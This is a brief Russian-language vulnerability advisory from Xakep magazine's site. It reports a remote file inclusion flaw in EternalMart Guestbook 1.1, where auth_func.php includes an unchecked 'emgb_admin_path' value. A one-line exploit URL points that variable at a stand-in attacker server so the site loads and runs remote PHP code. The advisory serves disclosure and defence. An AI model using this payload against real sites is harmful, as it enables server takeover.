Выполнение произвольного PHP кода в EternalMart Guestbook

Рекомендуем почитать:

Xakep #301. Магия виртуализации

Содержание выпуска
Подписка на «Хакер»-60%

Программа: EternalMart Guestbook 1.1

Уязвимость обнаружена в EternalMart Guestbook. Злонамеренный пользователь может выполнить произвольный PHP код на системе.
Сценарий "auth_func.php" не проверяет местоположение PHP файла, включаемого в переменной "emgb_admin_path". В результате удаленный пользователь может заставить сервер включить и выполнить произвольный PHP код на системе с привилегиями Web сервера.

Пример/Эксплоит:

/admin/auth.php?emgb_admin_path=http://[evil_server]

Выполнение произвольного PHP кода в EternalMart Guestbook

Xakep #301. Магия виртуализации

Подпишись на наc в Telegram!

Из рубрики «Взлом»

ReForge. Улучшаем картинки, генерируемые Stable Diffusion

HTB Corporate. Эксплуатируем Self-XSS, брутим PIN от Bitwarden и подделываем JWT

Асинхронная рансомварь. Разбираем механизм самых быстрых криптолокеров

Malleable C2. Создаем профиль для скрытой передачи данных Cobalt Strike

Трюки

Кастомный Arch. Создаем образы Arch Linux для десктопа и Raspberry Pi

Диета для Arch Linux. Запускаем Arch на компьютерах с малым объемом памяти

Карманный Arch. Делаем флешку с живым образом Arch Linux

Липовый соникс. Реверсим картридж Liposonix и пишем его эмулятор

Последние новости

Банки Сингапура отказываются от использования одноразовых паролей ради борьбы с фишингом

Криптовалютные платформы пострадали от DNS-атак, связанных с Squarespace

Тысячи людей стали жертвам SMS-стилеров SMS Webpro и NotifySmsStealer

Опубликованные в сети PoC-эксплоиты используются в атаках уже через 22 минуты

Исследователи обнаружили сеть из 570 ресурсов по продаже поддельных документов